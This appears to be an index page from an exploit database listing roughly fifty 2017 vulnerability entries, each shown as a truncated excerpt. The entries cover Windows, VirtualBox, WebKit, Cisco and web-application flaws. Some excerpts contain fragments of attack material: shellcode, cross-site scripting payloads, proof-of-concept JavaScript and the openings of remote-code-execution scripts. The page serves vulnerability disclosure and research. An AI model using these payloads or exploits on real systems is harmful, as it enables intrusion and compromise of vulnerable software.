Linux/x86 - Egg-hunter Shellcode (18 bytes)
Linux/x86 - Egg-hunter Shellcode 18 bytes. Shellcode exploit for Linx86 platform // Description: an 18-byte egg hunter on contiguous memory segments // // You are free to do whatever you want of this shellcode // // @phacktul / global start section .text start: mov eax, start ; we set a valid .tex...
Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'operationSpreadGeneric' Universal Cross-Site Scripting
'use strict'; function spreada return ...a; let arr = Object.create1, 2, 3, 4; for let i = 0; i f.onload = null; try spreadf.contentWindow; catch e e.constructor.constructor'alertlocation'; ; f.src = 'https://abc.xyz/';...
Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting
jsCallee // newTarget may be an InternalFunction if we were called from Reflect.construct. JSFunction targetFunction = jsDynamicCastnewTarget; if LIKELYtargetFunction ... return targetFunction-rareDatavm-createInternalFunctionAllocationStructureFromBasevm, prototype, baseClass; ... else ... retur...
Oracle VM VirtualBox - Guest-to-Host Privilege Escalation via Broken Length Handling in slirp Copy
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1086 There is a vulnerability in VirtualBox that permits an attacker with root privileges in a virtual machine with a NAT network interface to corrupt the memory of the userspace host process and leak memory contents from the...
Microsoft Windows - ManagementObject Arbitrary .NET Serialization Remote Code Execution
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1081 Windows: ManagementObject Arbitrary .NET Serialization RCE Platform: .NET 4.6, Powershell 4. Tested between Server 2016 and Windows 10 Anniversary Edition Class: Remote Code Execution Summary: Accessing a compromised WMI serve...
Microsoft Windows 10 - Runtime Broker ClipboardBroker Privilege Escalation
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1079 Windows: Runtime Broker ClipboardBroker EoP Platform: Windows 10 10586/14393 not tested 8.1 Update 2 Class: Elevation of Privilege Summary: The Runtime Broker’s Clipboard Broker allows any low IL/AppContainer such as Edge or I...
Microsoft Windows 10 (Build 10586) - 'IEETWCollector' Arbitrary Directory/File Deletion Privilege Escalation
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1093 Windows: IEETWCollector Arbitrary Directory/File Deletion EoP Platform: Windows 10 10586 not tested on anything else Class: Elevation of Privilege Summary: When cleaning up an ETW session the IEETWCollector service deletes i...
Oracle VM VirtualBox - 'virtio-net' Guest-to-Host Out-of-Bounds Write
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1136 This is a vulnerability that affects VirtualBox VMs that use a virtio network adapter which is a non-standard configuration. It permits the guest kernel to write up to 4GB of controlled data out of bounds in the trusted userla...
Oracle VM VirtualBox 5.0.32 r112930 (x64) - Windows Process COM Injection Privilege Escalation
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1103 VirtualBox: Windows Process COM Injection EoP Platform: VirtualBox v5.0.32 r112930 x64 Tested on Windows 10 Class: Elevation of Privilege Summary: The process hardening implemented by the VirtualBox driver can be circumvented ...
Oracle VM VirtualBox 5.1.14 r112924 - Unprivileged Host User to Host Kernel Privilege Escalation via ALSA config
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1141 This is another way to escalate from an unprivileged userspace process into the VirtualBox process, which has an open file descriptor to the privileged device /dev/vboxdrv and can use that to compromise the host kernel. The...
Oracle VM VirtualBox - Environment and ioctl Unprivileged Host User to Host Kernel Privilege Escalation
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1091 This bug report describes two separate issues that, when combined, allow any user on a Linux host system on which VirtualBox is installed to gain code execution in the kernel. Since I'm not sure which one of these issues cross...
Huawei HG532n - Command Injection (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' require 'base64' class MetasploitModule 'Huawei HG532n Command Injection', 'Description' = %q This module exploits a command injection vulnerability in...
Dmitry 1.3a - Local Buffer Overflow (PoC)
Exploit Title: DmitryDeepmagic Information Gathering Tool Local Stack Buffer Overflow CVE: CVE-2017-7938 CWE: CWE-119 Exploit Author: Hosein Askari FarazPajohan Vendor HomePage: http://mor-pah.net/software/dmitry-deepmagic-information-gathering-tool/ Version : 1.3a Unix Exploit Tested on: Parrot ...
Tenable Appliance < 4.5 - Root Remote Code Execution
#!/bin/bash : ' According to http://static.tenable.com/proddocs/upgradeappliance.html they fixed two security vulnerabilities in the web interface in release 4.5 so I guess previous versions are also vulnerable. Exploit Title: Unauthenticated remote root code execution on Tenable Appliance Date:...
pinfo 0.6.9 - Local Buffer Overflow (PoC)
Title: pinfo v0.6.9 - Local Buffer Overflow Author: Nassim Asrir Researcher at: Henceforth Author contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/ CVE: N/A Download $ apt-get install pinfo POC For any Question or discussion about this vuln:...
Microsoft Word - '.RTF' Remote Code Execution
#!/usr/bin/env python ''' Exploit toolkit CVE-2017-0199 - v4.0 https://github.com/bhdresh/CVE-2017-0199 Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41894.zip ''' import os,sys,thread,socket,sys,getopt,binascii,shutil,tempfile from random import randin...
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework auxiliary/scanner/smb/smbms17010 require 'msf/core' class MetasploitModule 'MS17-010 SMB RCE Detection', 'Description' = %q Uses information disclosure to determine if...
Mantis Bug Tracker 1.3.0/2.3.0 - Password Reset
Credits: John Page a.k.a hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt + ISR: ApparitionSec Vendor: ================ www.mantisbt.org Product: ================== Mantis Bug Tracker v1.3.0 /...
WinSCP 5.9.4 - 'LIST' Denial of Service (Metasploit)
Exploit Title: WinSCP 5.9.4 - LIST Command Denial of service Crush application Date: 4-4-2017 mm.dd.yy Exploit Author: M.Ibrahim [email protected] E-Mail: vulnbug gmail.com Vendor Home Page: https://winscp.net/eng/index.php Vendor download link: https://winscp.net/download/WinSCP-5.9.4-Setup.exe...
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation
/ Title: Linux Kernel 4.8.0 udev 232 - Privilege Escalation Author: Nassim Asrir Researcher at: Henceforth Author contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/ The full Research: https://www.facebook.com/asrirnassim/ CVE: CVE-2017-7874 Exp first of all we need...
Mozilla Firefox - Address Bar Spoofing
location=URL.createObjectURLnew Blob'Not Googleiflocation.href.indexOf"google"==-1location.pathname="https://www.google.com/"elsedocument.title="Google Search"', type: 'text/html'...
VirusChaser 8.0 - Local Buffer Overflow (SEH)
Exploit Title: Virus Chaser 8.0 - Scanner component, SEH Overflow Date: 14 April 2017 Exploit Author: 0x41Li [email protected] Vendor Homepage: https://www.viruschaser.com/ Software Link: https://www.viruschaser.com/download/VC80b32Setup.zip Tested on: Windows 7 Universal import os from struct...
Concrete5 CMS 8.1.0 - 'Host' Header Injection
Credits: John Page a.k.a hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CONCRETE5-v8.1.0-HOST-HEADER-INJECTION.txt + ISR: ApparitionSec Vendor: ================== www.concrete5.org Product: ================ concrete5 v8.1.0 concrete5 is an...
Linux/x86-64 - execve("/bin/sh") Shellcode (31 bytes)
Linux/x86-64 - execve"/bin/sh" Shellcode 31 bytes. Shellcode exploit for Linx86-64 platform Hi, This time I want to submit a shellcode whose length is 31 bytes, It's tested on Linux x86-64 ;=========================================================== ===================== ; The MIT License ; ;...
Microsoft Windows Kernel - 'win32k.sys' Multiple 'NtGdiGetDIBitsInternal' System Call
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1078 We have discovered two bugs in the implementation of the win32k!NtGdiGetDIBitsInternal system call, which is a part of the graphic subsystem in all modern versions of Windows. The issues can potentially lead to kernel pool...
Microsoft Windows Kernel - 'win32kfull!SfnINLPUAHDRAWMENUITEM' Stack Memory Disclosure
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1192 We have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 10 indirectly through the win32k!NtUserPaintMenuBar system call, or more specifically,...
Alienvault OSSIM/USM 5.3.4/5.3.5 - Remote Command Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule 'AlienVault USM/OSSIM API Command Execution', 'Description' = %q This module exploits an unauthenticated command injection in...
Adobe Creative Cloud Desktop Application < 4.0.0.185 - Local Privilege Escalation
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/ADOBE-CREATIVE-CLOUD-PRIVILEGE-ESCALATION.txt + ISR: apparitionSec Vendor: ============== www.adobe.com Product: ======================================== Adobe Creative Cloud...
GNS3 Mac OS-X 1.5.2 - 'ubridge' Local Privilege Escalation
#!/bin/sh GNS-3 Mac OS-X LPE local root exploit ===================================== GNS-3 on OS-X bundles the "ubridge" binary as a setuid root file. This file can be used to read arbitrary files using the "-f" argument but also, as it runs as root, can also write arbitrary files with "pcapfile"...
agorum core Pro 7.8.1.4-251 - Persistent Cross-Site Scripting
!-- Source: https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2017-005.txt Advisory ID: SYSS-2017-005 Product: agorum core Pro Manufacturer: agorum Software GmbH Affected Versions: 7.8.1.4-251 Tested Versions: 7.8.1.4-251 Vulnerability Type: Persistent Cross-Site Scripting...
agorum core Pro 7.8.1.4-251 - Cross-Site Request Forgery
!-- Source: https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2017-008.txt Advisory ID: SYSS-2017-008 Product: agorum core Pro Manufacturer: agorum Software GmbH Affected Versions: 7.8.1.4-251 Tested Versions: 7.8.1.4-251 Vulnerability Type: Cross-Site Request Forgery CWE-352...
Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution
#!/usr/bin/python Author: Artem Kondratenko @artkond import socket import sys from time import sleep setcredless = True if lensys.argv 3: print sys.argv0 + ' host --set/--unset' sys.exit elif sys.argv2 == '--unset': setcredless = False elif sys.argv2 == '--set': pass else: print sys.argv0 + ' host...
Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution
Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution. CVE-2017-3881. Remote exploit for Hardware platform #!/usr/bin/python Author: Artem Kondratenko @artkond import socket import sys from time import sleep setcredless = True if lensys.argv 3: print sys.argv0 + ' host --set/--unset'...
Solaris 7 < 11 (SPARC/x86) - 'EXTREMEPARR' dtappgather Privilege Escalation
#!/bin/ksh Exploit PoC reverse engineered from EXTREMEPARR which provides local root on Solaris 7 - 11 x86 & SPARC. Uses an environment variable of the setuid binary dtappgather to manipulate file permissions and create a user-owned directory anywhere on the system as root. Can then add a shared object...
Cisco Catalyst 2960 IOS 12.2(55)SE11 - 'ROCEM' Remote Code Execution
#!/usr/bin/python Exploit Title: Cisco Catalyst 2960 - Buffer Overflow Exploit Details: https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/ Date: 04.10.2017 Exploit Author: https://twitter.com/artkond Vendor Homepage: https://www.cisco.com/ Version: IOS version...
Proxifier for Mac 2.17/2.18 - Privesc Escalation
Source: https://m4.rkw.io/blog/cve20177643-local-root-privesc-in-proxifier-for-mac--218.html Proxifier 2.18 also 2.17 and possibly some earlier version ships with a KLoader binary which it installs suid root the first time Proxifier is run. This binary serves a single purpose which is to load and...
MyBB smilie Module < 1.8.11 - 'pathfolder' Directory Traversal
Description: ============ product: MyBB Homepage: https://mybb.com/ vulnerable version: input'pathfolder'; Line 327 $dir = @opendirMYBBROOT.$path; if we input "pathfolder" to "../../bypass/smile",Directory Traversal success! ============ Fixed: ============ This vulnerability was fixed in version...
Apple WebKit - 'JSC::SymbolTableEntry::isWatchable' Heap Buffer Overflow
function x = 0 var a; function arguments function b var g = 1; a5; f; g; ; , unsigned int, unsigned int webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x15fcc73 4 0x10c2901ea in JSC::ScriptExecutable::...
Apple WebKit / Safari 10.0.3 (12602.4.8) - Universal Cross-Site Scripting via a Focus Event and a Link Element
child = mfirstChild removeBetweennullptr, child-nextSibling, child; notifyChildNodeRemovedthis, child; If the location hash value is set, the page will give focus to the associated element. However, if there is a stylesheet that has not been loaded yet, the focusing will be delayed until the...
WordPress Plugin Spider Event Calendar 1.5.51 - Blind SQL Injection
============================================= MGC ALERT 2017-003 - Original release date: April 06, 2017 - Last revised: April 10, 2017 - Discovered by: Manuel García Cárdenas - Severity: 7,1/10 CVSS Base Score ============================================= I. VULNERABILITY -----------------------...
Proxifier for Mac 2.18 - Multiple Vulnerabilities
Source: https://www.securify.nl/advisory/SFY20170401/multiplelocalprivilegeescalationvulnerabilitiesinproxifierformac.html Abstract Multiple local privileges escalation vulnerabilities were found in the KLoader binary that ships with Proxifier. KLoader is responsible for loading a Kernel Extensio...
Horde Groupware Webmail 3/4/5 - Multiple Remote Code Executions
Source: https://blogs.securiteam.com/index.php/archives/3107 Vulnerabilities Summary The following advisory describes two 2 vulnerabilities found in Horde Groupware Webmail. Horde Groupware Webmail Edition is a free, enterprise ready, browser based communication suite. Users can read, send and...
Brother MFC-J6520DW - Authentication Bypass / Password Change
ASCII hex -- md5 e.g. AuthCookie=c243a9ee18a9327bfd419f31e75e71c7 for 'test' password This information can be used to crack current password from exported cookie. Fix: Minimize network access to Brother MFC device or disable HTTPS interface. Confirmed vulnerable: MFC-J6973CDW MFC-J4420DW MFC-8710...
MyBB < 1.8.11 - 'email' MyCode Cross-Site Scripting
Description: ============ product: MyBB Homepage: https://mybb.com/ vulnerable version: 1.8.11 Severity: High risk =============== Proof of Concept: ============= 1. post a thread or reply to any thread, write: email=2"onmouseover="alertdocument.locationhover me/email then when the user's mouse hovers over it, XSS...
Apple WebKit - 'Document::adoptNode' Use-After-Free
var s = document.body.appendChilddocument.createElement'script'; s.type = '0'; s.textContent = 'document.body.appendChildparent.i0'; var i0 = s.appendChilddocument.createElement'iframe'; s.type = ''; var f = document.body.appendChilddocument.createElement'iframe'; f.contentDocument.adoptNodei0;...
FAQ Script 3.1.3 - 'category_id' SQL Injection
Exploit Title: FAQ Script 3.1.3 - SQL Injection Google Dork: N/A Date: 11.04.2017 Vendor Homepage: http://www.phponly.com/ Software: http://www.phponly.com/faq.html Demo: http://www.phponly.com/demo/faq/ Version: 3.1.3 Tested on: Win7 x64, Kali Linux x64 Exploit Author: Ihsan Sencan Author Web:...
Social Directory Script 2.0 - SQL Injection
Exploit Title: Social Directory Script 2.0 - SQL Injection Google Dork: N/A Date: 11.04.2017 Vendor Homepage: http://www.phponly.com/ Software: http://www.phponly.com/Social-Directory.html Demo: http://www.phponly.com/demo/link/ Version: 2.0 Tested on: Win7 x64, Kali Linux x64 Exploit Author: Ihs...
Xen - Broken Check in 'memory_exchange()' Permits PV Guest Breakout
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1184 This bug report describes a vulnerability in memoryexchange that permits PV guest kernels to write to an arbitrary virtual address with hypervisor privileges. The vulnerability was introduced through a broken fix for...
MyClassifiedScript 5.1 - SQL Injection
Exploit Title: Classified Portal Software 5.1 - SQL Injection Google Dork: N/A Date: 11.04.2017 Vendor Homepage: http://www.myclassifiedscript.com/ Software: http://www.myclassifiedscript.com/demo.html Demo: http://www.clpage.com/ Version: 5.1 Tested on: Win7 x64, Kali Linux x64 Exploit Author:...
Apple WebKit - 'JSC::B3::Procedure::resetReachability' Use-After-Free
function for var i = 0; i 1000000; ++i const v = Array & 1 ? v : 1; typeof o = 'object'; ; !-- Asan Log: ================================================================= ==32191==ERROR: AddressSanitizer: heap-use-after-free on address 0x607000099738 at pc 0x000106c7af16 bp 0x700006a57850 sp...